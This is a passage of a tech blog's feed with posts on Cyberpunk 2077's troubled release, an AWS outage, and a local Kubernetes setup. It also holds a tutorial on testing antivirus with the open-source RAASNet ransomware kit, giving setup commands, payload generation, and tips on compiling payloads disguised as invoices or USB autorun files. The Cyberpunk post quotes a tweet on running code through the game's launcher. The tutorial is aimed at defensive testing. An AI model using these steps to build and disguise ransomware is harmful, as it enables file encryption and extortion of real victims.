image</li><li>Impact on the company&#x2019;s stock market valuation</li></ul><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image-2.png" class="kg-image" alt="Cyberpunk 2077: Analysis of an agile method failure" loading="lazy" width="642" height="485" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image-2.png 600w, https://en.tferdinand.net/content/images/2022/01/image-2.png 642w"></figure><h2 id="agility-don%E2%80%99t-know-it">Agility, don&#x2019;t know it!</h2><p>I&#x2019;m not going to present all 
the concepts of agility here, but rather talk about one of its basic objectives: bringing the business and the developers closer together so that each can take into account the constraints and needs of the other.</p><p>What is clear in the history of the development of this game is the total desynchronization of the two parties. The successive postponements are a typical example; they highlight the fact that the business either was not aware of the remaining workload or had greatly underestimated it.</p><p>In the first case, it shows that the approach taken is not suited to delivering a finished product; in the second case, it may come from a lack of guidance.</p><p>In an agile/DevOps world, measuring is key. Normally, we are able to roughly estimate the velocity we can achieve in a sprint, although mistakes can happen.</p><blockquote>&#x201C;We ignored the signals about the need for additional time to refine the game on the base last-gen consoles. It was the wrong approach and against our business philosophy.&#x201D;</blockquote><p>Yet, we can see in the official statements that alarms were raised about the developers needing more time to release a finished product.</p><p>Even if one can easily understand the &#x201C;deadline&#x201D; of December 10 (2 weeks before Christmas), it is a pity that the deadline was so rigid that all the signals indicating they were heading straight into a wall were ignored.</p><h2 id="the-importance-of-testing">The importance of testing</h2><p>Releasing a game on four consoles simultaneously and on computers, as well as on streaming platforms, is not as simple as it seems:</p><ul><li>Multiple technical specifications</li><li>Specificity of the SDK of each console</li><li>Different processor architectures</li></ul><p>CD Projekt Red admitted that they did not test their game enough on consoles and focused on the PC.</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image-3.png" 
class="kg-image" alt="Cyberpunk 2077: Analysis of an agile method failure" loading="lazy" width="1600" height="900" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image-3.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/image-3.png 1000w, https://en.tferdinand.net/content/images/2022/01/image-3.png 1600w" sizes="(min-width: 720px) 720px"></figure><p>The concern is that even on a PC, some bugs and anomalies are very hard to comprehend; we could mention:</p><ul><li>The lack of SMT support on AMD processors: it is simply incomprehensible that testing signed this off; having tested on our home config (AMD Ryzen 1600 + Nvidia GTX 1070), we gained 40% of additional performance (about 20 FPS)! (This point has been corrected since version 1.05)</li><li>The default QWERTY configuration and the non-ergonomic controls in general</li><li>The elements of the scenery that float in the air (phones for example)&#x2026;</li><li>The &#x201C;Lorem ipsum&#x201D; left over in some languages; these placeholders are normally used during development to simulate text content</li></ul><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image-4.png" class="kg-image" alt="Cyberpunk 2077: Analysis of an agile method failure" loading="lazy" width="652" height="619" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image-4.png 600w, https://en.tferdinand.net/content/images/2022/01/image-4.png 652w"></figure><ul><li>Bugs with subtitles or object tooltips that remain permanently displayed on the screen</li><li>Vehicles that appear under the map</li></ul><p>And I could keep the list going for a long time&#x2026; and these are only the bugs that I could see on my side, with a recent PC!</p><h2 id="and-the-security-of-all-this">And the security of all this?</h2><p>Cyberpunk is launched via a launcher, which fortunately can be bypassed when you have it, like me, on 
Steam. The problem is that this launcher is (like many launchers) a huge security flaw, making it easy to execute arbitrary code if it is compromised&#x2026;</p><figure class="kg-card kg-embed-card"><blockquote class="twitter-tweet"><p lang="en" dir="ltr">Red Teamers - why not use <a href="https://twitter.com/hashtag/Cyberpunk2077?src=hash&amp;ref_src=twsrc%5Etfw&amp;ref=en.tferdinand.net">#Cyberpunk2077</a>&apos;s signed launcher to execute your code? Simply edit launcher-configuration.json and copy your payload anywhere within the root directory &#x1F609; <a href="https://t.co/M0bJ2tIDKX?ref=en.tferdinand.net">pic.twitter.com/M0bJ2tIDKX</a></p>&#x2014; Lloyd Davies (@LloydLabs) <a href="https://twitter.com/LloydLabs/status/1336866373331546112?ref_src=twsrc%5Etfw&amp;ref=en.tferdinand.net">December 10, 2020</a></blockquote>
<script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
</figure><p>As far as hacking is concerned, this is &#x201C;script kiddie&#x201D; territory here&#x2026;</p><p>But since we don&#x2019;t have a DevOps approach, I won&#x2019;t ask for DevSecOps!</p><h2 id="what-could-have-limited-this-disaster">What could have limited this disaster</h2><p>I know it&#x2019;s easy to criticize after the fact; however, I&#x2019;d like to raise a few points that might have helped limit this disaster.</p><h3 id="limiting-the-release-to-pc-at-first">Limiting the release to PC at first</h3><p>This is the strategy used by Rockstar for its games: release first on console, then a few months later on PC.</p><p>This has several benefits:</p><ul><li>Bugs are located on fewer platforms</li><li>It allows focusing development and testing on fewer platforms</li><li>It potentially allows selling several copies of the same game, since players are not necessarily willing to wait several months</li></ul><p>CD Projekt Red is a small studio; spreading itself across so many platforms in parallel is risky.</p><h3 id="not-selling-the-perfect-game-in-all-aspects">Not selling the perfect game in all aspects</h3><p>The game has clearly been oversold, announced several times as &#x201C;fully playable, but needs to be refined&#x201D;. Here again we find the desynchronization between business and developers, where things are sold first and only then do we look at how to develop them.</p><p>This is something I&#x2019;ve often experienced in IT (unfortunately), where you promise things to a customer, but at no time:</p><ul><li>IT was asked for a realistic estimate of the timeframe</li><li>We asked ourselves if it was technically feasible without costing more than it brings to the company.</li></ul><p>The problem is that the game was sold on too many aspects at the same time, which I think is difficult to do for a company of this size.</p><h3 id="release-the-game-in-%E2%80%9Cearly-access%E2%80%9D-or-%E2%80%9Cclosed-beta%E2%80%9D">Release the game in &#x201C;early 
access&#x201D; or &#x201C;closed beta&#x201D;</h3><p>An approach used more and more often: it would have been possible to release the game in &#x201C;early access&#x201D;, that is to say, releasing it &#x201C;as is&#x201D; but iterating quickly. Players are more understanding of games that have problems in early access than in a final version, and this allows for much more feedback.</p><p>Also, a closed beta with a limited number of users would probably have allowed solving a lot of problems (especially if you include different hardware configurations).</p><h2 id="not-everything-is-black">Not everything is black</h2><p>To finish this post, I would conclude by saying that not everything is bleak.</p><p>On PC, the game is completely playable; I have, for my part, quite a few hours of play on it. Graphically, it is also a success, with a universe of its own; the art direction has done an impressive job.</p><figure class="kg-card kg-gallery-card kg-width-wide"><div class="kg-gallery-container"><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201218221047_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201218221047_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201218221047_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201218085420_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201218085420_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201218085420_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201222230823_1.jpg" width="1000" height="563" 
loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201222230823_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201222230823_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div></div><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201222214955_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201222214955_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201222214955_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201218215353_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201218215353_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201218215353_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201222215541_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201222215541_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201222215541_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div></div><div class="kg-gallery-row"><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201222230650_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201222230650_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201222230650_1.jpg 1000w" 
sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201218202529_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201218202529_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201218202529_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div><div class="kg-gallery-image"><img src="https://en.tferdinand.net/content/images/2022/01/20201216081742_1.jpg" width="1000" height="563" loading="lazy" alt="Cyberpunk 2077: Analysis of an agile method failure" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/20201216081742_1.jpg 600w, https://en.tferdinand.net/content/images/2022/01/20201216081742_1.jpg 1000w" sizes="(min-width: 720px) 720px"></div></div></div></figure><p>Also, in terms of writing, we feel that some characters are quite well developed and have depth. I also salute the efforts of the studio to put many women as central characters in their game!</p><p>The Witcher was also riddled with bugs at its release, but is now considered one of the best games of the decade; no doubt the aim will be corrected on this game too, especially since the studio has already delivered its first volleys of fixes.</p><p>However, I would also note that releasing &#x201C;poorly finished&#x201D; games under the pretext that they can be patched later is becoming a norm in the video game industry, making the customer pay the price of an unstable product. Nowadays, many studios are in the same situation (hi Assassin&#x2019;s Creed and its blocking bugs that were fixed one month after its release).</p>]]></content:encoded></item><item><title><![CDATA[Test your antivirus with a cryptolocker (mastered)]]></title><description><![CDATA[<p>Computer attack patterns have evolved in recent years. 
Cryptolockers have become the spearhead of many hackers.</p><p>Does your antivirus vendor promise you that you are protected against these new threats? OK, prove it before you get stuck by a real attack.</p><h2 id="let%E2%80%99s-talk-about-cryptolocker">Let&#x2019;s talk about cryptolocker</h2><p>The principle of</p>]]></description><link>https://en.tferdinand.net/test-your-antivirus-with-a-cryptolocker-mastered/</link><guid isPermaLink="false">6337ff9a65fbc6000155a56a</guid><category><![CDATA[Security]]></category><category><![CDATA[Test]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Fri, 04 Dec 2020 06:00:00 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2022/01/Webp.net-compress-image-1.jpg" alt="Test your antivirus with a cryptolocker (mastered)"><p>Computer attack patterns have evolved in recent years. Cryptolockers have become the spearhead of many hackers.</p><p>Does your antivirus vendor promise you that you are protected against these new threats? OK, prove it before you get stuck by a real attack.</p><h2 id="let%E2%80%99s-talk-about-cryptolocker">Let&#x2019;s talk about cryptolocker</h2><p>The principle of a cryptolocker is quite simple: encrypt target files (often .doc, .txt, .odt, etc.) and then demand a ransom. Ransomware has nothing to gain by destroying the underlying OS, so system files are rarely touched.</p><p>So it will encrypt as many files as possible and then ask for payment (often in Bitcoin or other cryptocurrencies) to obtain the decryption key.</p><p>These threats are very serious; large groups have had to face them recently and were sometimes paralyzed for several days.</p><h3 id="detecting-a-cryptolocker">Detecting a cryptolocker</h3><p>The concern is that we now live in a world of increasingly sophisticated and discreet malware. 
Nowadays, the power of heuristic engines on antivirus software is widely exploited. These engines detect abnormal or dangerous behavior rather than just a previously identified binary (signature).</p><p>The purpose of the test I&#x2019;m proposing today is to evaluate the performance of this engine: its detection speed, its reaction (blocking the attack), and its remediation.</p><h3 id="ransomware-as-a-service">Ransomware as a service</h3><p>To perform these tests, we will use a small open-source tool:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://github.com/leonv024/RAASNet?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">GitHub - leonv024/RAASNet: Open-Source Ransomware As A Service for Linux, MacOS and Windows</div><div class="kg-bookmark-description">Open-Source Ransomware As A Service for Linux, MacOS and Windows - GitHub - leonv024/RAASNet: Open-Source Ransomware As A Service for Linux, MacOS and Windows</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://github.com/fluidicon.png" alt="Test your antivirus with a cryptolocker (mastered)"><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">leonv024</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://repository-images.githubusercontent.com/199071705/cfc26700-b49d-11e9-9fe2-3ce87c03fee8" alt="Test your antivirus with a cryptolocker (mastered)"></div></a></figure><p>This small Python script simulates the basic operation of a cryptolocker.</p><p>It will allow you to start a local server, which will be used to collect information about the encryption (IP address, encryption keys, etc.).</p><p>It also allows you to create the script that will be used for the encryption, and to compile it to make it portable.</p><h3 id="why-is-this-project-interesting">Why is this project interesting?</h3><p>First of all, its appeal is that it is completely harmless:</p><ul><li>It does 
not spread on your network</li><li>You can decrypt the data</li><li>It is open source; you can see or modify the code</li><li>It works on any OS, because it only requires Python 3</li></ul><p>Then, the attack model is all the more interesting as it is realistic: a Python script used in &#x201C;standalone&#x201D; mode simulates a concrete case, for example a malicious third-party library available on pip.</p><p>This also allows you to check that your antivirus software reacts to attacks that are not binaries.</p><h2 id="download-and-set-up-the-prerequisites">Download and set up the prerequisites</h2><h3 id="clone-the-repository">Clone the repository</h3><p>If you have the Git client installed, you can clone the repository directly:</p><pre><code>git clone git@github.com:leonv024/RAASNet.git
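</code></pre><p>If you don&#x2019;t have an SSH key registered on GitHub, the HTTPS remote works just as well (a small addition on my side):</p><pre><code>git clone https://github.com/leonv024/RAASNet.git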
</code></pre><p>If you don&#x2019;t have the Git client, you can also directly download the zip file from the repository.</p><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image.png" class="kg-image" alt="Test your antivirus with a cryptolocker (mastered)" loading="lazy" width="917" height="440" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image.png 600w, https://en.tferdinand.net/content/images/2022/01/image.png 917w" sizes="(min-width: 720px) 720px"></figure><h3 id="installing-the-prerequisites">Installing the prerequisites</h3><p>On the PC on which you want to test the script, you need to have Python 3 installed, as well as the pip3 client.</p><p>For these installations, I invite you to check the associated documentation pages to see how to install them in your OS context:</p><ul><li>Python 3: <a href="https://docs.python.org/fr/3/using/index.html?ref=en.tferdinand.net">https://docs.python.org/fr/3/using/index.html</a></li><li>PIP 3: <a href="https://pip.pypa.io/en/stable/installing/?ref=en.tferdinand.net">https://pip.pypa.io/en/stable/installing/</a></li></ul><p>Once these steps are done, install the prerequisites:</p><!--kg-card-begin: markdown--><pre><code>pip install -r ./requirements.txt</code></pre>
<!--kg-card-end: markdown--><p>Under Windows, it is necessary to install an additional package for GUI window handling:</p><pre><code>pip install image</code></pre><h3 id="start-the-application">Start the application</h3><p>Once the prerequisites are installed, you can start the application:</p><pre><code>python3 ./RAASNet.py</code></pre><p>Once this is done, you will have to create an account; a valid email address is not required for this account.</p><p>Then you can start the server; this will allow you to collect information when encryption starts.</p><p><strong>Warning: If you do not start the server, you will not have the decryption key!</strong></p><h2 id="initiate-the-attack-payload">Initiate the attack payload</h2><p>Now that we have prepared the base of our attack, the next step is to create the attack script.</p><p>To do this, we will click on &#x201C;Generate Payload&#x201D;. Then you can select the options for your attack:</p><ul><li>The list of target files</li><li>The base directory for the attack</li><li>The encryption method to use</li><li>Whether or not to display a window at the end to indicate that the content is encrypted</li></ul><figure class="kg-card kg-image-card"><img src="https://en.tferdinand.net/content/images/2022/01/image-1.png" class="kg-image" alt="Test your antivirus with a cryptolocker (mastered)" loading="lazy" width="1366" height="768" srcset="https://en.tferdinand.net/content/images/size/w600/2022/01/image-1.png 600w, https://en.tferdinand.net/content/images/size/w1000/2022/01/image-1.png 1000w, https://en.tferdinand.net/content/images/2022/01/image-1.png 1366w" sizes="(min-width: 720px) 720px"></figure><p>Once the configuration is done, just click on &#x201C;Generate&#x201D; to create two scripts:</p><ul><li>payload.py: this script is the attack payload itself</li><li>decrypt.py: this script allows decrypting the files after the attack</li></ul><h2 id="it%E2%80%99s-popcorn-time">It&#x2019;s popcorn 
time!</h2><p>Now that you have everything ready, it&#x2019;s the most fun part: launching the attack!</p><p>Here are three points to watch on your antivirus:</p><ul><li>whether or not the attack is detected</li><li>the speed of detection</li><li>the possibility to remediate or not: does the antivirus know how to restore the encrypted files?</li></ul><p>To launch the attack, a simple command:</p><pre><code>python3 payload.py</code></pre><p>Depending on the encryption method you have chosen and the volume of data, the encryption will take anywhere from a few seconds to several minutes.</p><p>The point here is to see whether or not your antivirus software reacts to the encryption via its heuristic engine.</p><p>For the test to be as consistent as possible, don&#x2019;t hesitate to vary the attack mode, for example by launching the encryption from a USB key and setting up the server remotely.</p><p>Moreover, to be sure to trigger your antivirus, don&#x2019;t hesitate to use a decent volume of files (a few thousand) to make sure it is sufficient to make it react.</p><h3 id="and-in-binary">And in binary?</h3><p>RAASNet also allows you to convert Python scripts into classic binaries. 
It can even replace the default icon.</p><p>By doing so, you can reproduce classic attack patterns, e.g., a PDF invoice by email, an autorun executable on a USB stick, a download from a third-party site, etc.</p><p>Once again, the idea is to reproduce classic attacks and observe the reaction (or not) of your antivirus.</p><h2 id="to-conclude">To conclude</h2><p>Whether your antivirus has detected the attack or not, you must remain pragmatic.</p><p>Depending on the vector used, it may be normal that your antivirus considered the action legitimate; that&#x2019;s why you should not hesitate to launch the payload from a simple USB key, for example.</p><p>Moreover, this malware is deliberately unknown and harmless, so the risk is controlled.</p><p>However, this is a simple and interesting test to check the reaction of your antivirus.</p><p>For my part, my personal antivirus detected the abnormal behavior after a few encrypted files and restored the content.</p>]]></content:encoded></item><item><title><![CDATA[Turn off the Internet: AWS is no longer responding!]]></title><description><![CDATA[<p>A few days ago, an incident impacting the AWS cloud provider had a significant impact on many companies and services directly affected by this instability.</p><p>I saw on social networks many reactions, often off-topic (unfortunately) and I thought it could be useful to give you my analysis of</p>]]></description><link>https://en.tferdinand.net/turn-off-the-internet-aws-is-no-longer-responding/</link><guid isPermaLink="false">6337ff9a65fbc6000155a568</guid><category><![CDATA[Point of view]]></category><category><![CDATA[AWS]]></category><category><![CDATA[Amazon]]></category><category><![CDATA[chaos]]></category><category><![CDATA[fullcover]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Mon, 30 Nov 2020 17:53:04 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2020/11/nastya_dulhiier_okoo_lRk9e--1-.jpg" 
medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2020/11/nastya_dulhiier_okoo_lRk9e--1-.jpg" alt="Turn off the Internet: AWS is no longer responding!"><p>A few days ago, an incident at the AWS cloud provider significantly disrupted many companies and services directly affected by this instability.</p><p>I saw many reactions on social networks, often beside the point (unfortunately), and I thought it could be useful to give you my analysis of the subject.</p><h2 id="rewind">Rewind</h2><p>Let&#x2019;s start with a quick recap of the incident.</p><p>On Wednesday evening (French time), AWS encountered a growing number of errors in some of its services in the us-east-1 (North Virginia) region.</p><p>Although an incident in a single region is not supposed to have a huge impact on AWS, keep in mind that this region is the &#x201C;core&#x201D; region of AWS. Most global services (IAM, CloudFront, Route53, etc.) depend heavily on it.</p><p>It should also be taken into account that an estimated 30% of the Internet today depends directly on AWS, which is simply colossal.</p><p>This is not the first AWS incident, and it won&#x2019;t be the last. It&#x2019;s been in the news because of the length of time it&#x2019;s been going on and the visibility it&#x2019;s been given. 
Many companies have indeed absolved themselves of any worries by throwing the ball back to Amazon, but things are a little more complicated than that.</p><h2 id="-everything-fails-all-the-time-">&#x201C;Everything fails all the time.&#x201D;</h2><p>This sentence does not come from me, but from the CTO of Amazon Web Services, Werner Vogels.</p><p>It is based on an elementary rule: wherever you host your service, you have to take into account that it will sometimes go down, like any infrastructure.</p><p>Having been in production for more than 10 years, I&#x2019;m familiar with the subject: you can make a service redundant, but you only reduce the risk of an incident. There is no such thing as zero risk.</p><p>During my AWS training sessions, this is a point that often comes up: the question to ask yourself about the design of your infrastructure is not &#x201C;how do I prevent my infrastructure from going down&#x201D;, but rather &#x201C;what do I do when my infrastructure goes down&#x201D;.</p><p>Those of you who, like me, work on AWS on a daily basis know that there are incidents every day, less impactful ones, but incidents all the same.</p><h2 id="the-risks-of-hyperconvergence">The risks of hyperconvergence</h2><p>The public clouds and especially the GAFAMs have allowed a hyper-convergence of many services.</p><p>Indeed, because of the building blocks on offer, it is very easy to decide to place all one&#x2019;s workloads at AWS/Azure/GCP.</p><p>A company can indeed find something to meet almost all its needs off the shelf, very often with directly managed services and the support that goes with it.</p><p>This aspect has been an important vector of acceleration in recent years, allowing us to deploy and therefore innovate ever faster.</p><p>The concern is that this has also made AWS an Internet colossus. 
Many companies have become completely dependent on this provider.</p><p>But simply saying the concern exists is seeing only the tip of the iceberg.</p><h2 id="design-and-risk-assessment">Design and risk assessment</h2><p>In an IT department, the role of an architect is to design a resilient infrastructure that meets technical and functional needs.</p><p>When we talk about resilience, we often think of always having an application running 24/7 with an availability rate of 99.99%.</p><p>In reality it&#x2019;s more complicated than that.</p><h2 id="risk-assessment-vs-cost">Risk assessment vs. cost</h2><p>Normally, when designing an architecture, you ask yourself what availability rate you are targeting and what unavailability would cost.</p><p>In addition, we need to see if there are mechanisms to mitigate unavailability.</p><p>For example, let&#x2019;s imagine a home automation device: it sends its metrics to AWS every 10 minutes.</p><p>What happens if my service that has to receive these metrics is unavailable?</p><p>Two choices here:</p><ul><li>I lose my metrics: the availability of my service is therefore essential</li><li>I have a local buffer on the device, allowing metrics to be delayed in case of unavailability: in this case, I can afford some unavailability, because I potentially lose only the &#x201C;real time&#x201D; part</li></ul><p>These two choices are already determined by the amount of money you want to put into a project.</p><p>Having local storage costs additional hardware, additional assembly complexity, and additional development and maintenance costs.</p><p>It also means that my server must be able to operate in &#x201C;catch-up&#x201D; mode.</p><p>The other aspect is to ask what the cost of downtime is:</p><ul><li>In terms of service provided</li><li>In terms of potential contractual penalties</li><li>In terms of image</li></ul><p>We then weigh this cost of unavailability against its probability. 
Very often, simplistically, the potential availability of infrastructure is that of the element with the lowest availability.</p><p>Then, we can ask ourselves how much it will cost to cover this unavailability.</p><p>Then we make a simple comparison and, quite obviously, the most cost-effective solution is the one chosen.</p><p>This is why unavailability is not always a problem. It is the role of the architects to evaluate it upstream.</p><h2 id="the-chaos-theory">The chaos theory</h2><p>To have confidence in your infrastructure, you have to test it. This is the basic idea of chaos engineering.</p><p>Accepting that your infrastructure will eventually fail is one thing; making it fail voluntarily, in a framework that you control, allows you to:</p><ul><li>increase confidence in your high availability</li><li>test your automated procedures and/or remediation</li></ul><p>Tools exist for this purpose; if you want to know more, I invite you to read the excellent posts of my colleague Akram on this subject on the WeScale blog [French links]:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://blog.wescale.fr/2019/09/26/le-guide-de-chaos-engineering-part-1/?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Le guide de Chaos Engineering : Partie 1</div><div class="kg-bookmark-description">Le Chaos Engineering (CE) est une discipline d&#x2019;exp&#xE9;rimentation dans les syst&#xE8;mescomplexes et distribu&#xE9;s, qui vise &#xE0; se rassurer sur leur comportement face &#xE0; desincidents et perturbations. 
Dans cet article je vais m&#x2019;attacher &#xE0; simplementapporter les bases du chaos et quelques d&#xE9;finitions pour pose&#x2026;</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://blog.wescale.fr/favicon.png" alt="Turn off the Internet: AWS is no longer responding!"><span class="kg-bookmark-author">Le blog des experts WeScale - DevOps, Cloud et passion</span><span class="kg-bookmark-publisher">Akram RIAHI</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://blog.wescale.fr/content/images/2019/09/Chaos-cover.png" alt="Turn off the Internet: AWS is no longer responding!"></div></a></figure><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://blog.wescale.fr/2020/03/19/le-guide-de-chaos-engineering-partie-2/?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">Le guide de Chaos Engineering : Partie 2</div><div class="kg-bookmark-description">Introduction Nous avons vu dans la premi&#xE8;re partie du guide du Chaos Engineering (CE)[/2019/09/26/le-guide-de-chaos-engineering-part-1/] que le CE ne peut pas avoirlieu sans exp&#xE9;rimentations. Nous allons continuer notre voyage fantastique dans ce monde en passant par lepays du &#x201C;Chaos Tools Cou&#x2026;</div><div class="kg-bookmark-metadata"><img class="kg-bookmark-icon" src="https://blog.wescale.fr/favicon.png" alt="Turn off the Internet: AWS is no longer responding!"><span class="kg-bookmark-author">Le blog des experts WeScale - DevOps, Cloud et passion</span><span class="kg-bookmark-publisher">Akram RIAHI</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://blog.wescale.fr/content/images/2020/03/Capture-d--cran-2020-03-19---10.15.14-1.png" alt="Turn off the Internet: AWS is no longer responding!"></div></a></figure><p>Some companies go so far as to use these tools in production. 
For example, Netflix runs its Simian Army in production to ensure the resilience of its infrastructure.</p><p>Breaking things in a controlled way also teaches you how to react when your infrastructure goes down, because it becomes a habit.</p><h2 id="to-conclude">To conclude</h2><p>The companies that put the blame on AWS are the only ones at fault.</p><p>Either they underestimated the impact of unavailability, or the unavailability costs them less than covering it would have.</p><p>Either way, depending on a single provider and a single region is a design choice. Blaming the provider is an easy way out and does not reflect reality.</p><p>It is possible to prepare for and simulate these outages ahead of time in order to react in the best possible way; repetition creates confidence.</p><p>The other concern comes from the fact that many companies have bet everything on AWS. The incidents of the last few days may reshuffle the cards a bit, but is that such a bad thing?</p><p>Advocating for a sovereign cloud provider is not the answer either if you put all your marbles in one place. Once again, good infrastructure design is essential, better safe than sorry. You can learn more about this subject in Damy.R&#x2019;s post [French link]:</p><figure class="kg-card kg-bookmark-card"><a class="kg-bookmark-container" href="https://www.damyr.fr/posts/aws-tombe-internet-tremble/?ref=en.tferdinand.net"><div class="kg-bookmark-content"><div class="kg-bookmark-title">AWS tombe, l&#x2019;internet tremble &#xB7; Damy.R</div><div class="kg-bookmark-description"></div><div class="kg-bookmark-metadata"><span class="kg-bookmark-author">Damy.R R&#xE9;parateur de nuage passionn&#xE9; par l&apos;opensource et la mouvance DevOps.</span></div></div><div class="kg-bookmark-thumbnail"><img src="https://www.damyr.fr/Damy.R.png" alt="Turn off the Internet: AWS is no longer responding!"></div></a></figure>]]></content:encoded></item><item><title><![CDATA[Create a local Kubernetes cluster with Vagrant]]></title><description><![CDATA[<p>Testing Kubernetes is quite easy thanks to solutions such as Minikube.</p><p>However, when you want to test cluster-specific features, such as load balancing or failover, it is not necessarily suitable anymore.</p><p>It is possible to build your Kubernetes infrastructure on servers, or by using managed services from a cloud provider</p>]]></description><link>https://en.tferdinand.net/create-a-local-kubernetes-cluster-with-vagrant/</link><guid isPermaLink="false">6337ff9a65fbc6000155a565</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Docker]]></category><category><![CDATA[DevOps]]></category><category><![CDATA[Infra as code]]></category><category><![CDATA[Linux]]></category><category><![CDATA[Traefik]]></category><category><![CDATA[K3S]]></category><category><![CDATA[Vagrant]]></category><category><![CDATA[fullcover]]></category><dc:creator><![CDATA[Teddy FERDINAND]]></dc:creator><pubDate>Tue, 15 Sep 2020 07:00:57 GMT</pubDate><media:content url="https://en.tferdinand.net/content/images/2020/09/banner_k3s_cluster.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://en.tferdinand.net/content/images/2020/09/banner_k3s_cluster.jpg" 
alt="Create a local Kubernetes cluster with Vagrant"><p>Testing Kubernetes is quite easy thanks to solutions such as Minikube.</p><p>However, when you want to test cluster-specific features, such as load balancing or failover, it is not necessarily suitable anymore.</p><p>It is possible to build your Kubernetes infrastructure on servers, or by using managed services from a cloud provider (Kapsule at Scaleway, AKS at Azure, GKE at GCP or EKS at AWS, for example).</p><p>Nevertheless, these solutions cost money; when you just want to test features or train yourself, they are not necessarily appropriate.</p><p>In this post, I propose to show you how to set up a Kubernetes cluster locally on your computer, with behavior similar to that of a classic cluster.</p><p>To do this, we will use several tools that I will describe below:</p><ul><li>Vagrant</li><li>VirtualBox (or VMware)</li><li>K3S</li><li>Traefik</li></ul><h2 id="vagrant-provisioning-of-virtual-machines">Vagrant: Provisioning of virtual machines</h2><p>Vagrant is a tool from HashiCorp (the editor of Terraform, which I have already mentioned).</p><p>This program allows you to quickly deploy virtual machines from description files.</p><p>Thus, by writing a VagrantFile, it is possible to deploy one or more machines in a few minutes, provisioning them with scripts or tools such as Ansible.</p><p>The advantage of Vagrant is that the configuration can be shared, allowing a whole team to work locally under the same conditions, reproducing production behavior at low cost.</p><p>Sharing a simple text file is enough; moreover, this file can be versioned in a version control tool.</p><h2 id="k3s-the-lighter-kubernetes">K3S: The lighter Kubernetes</h2><p>K3S is a tool created by Rancher (who also created an orchestrator of the same name for Docker).</p><p>It is a lightweight Kubernetes that can work 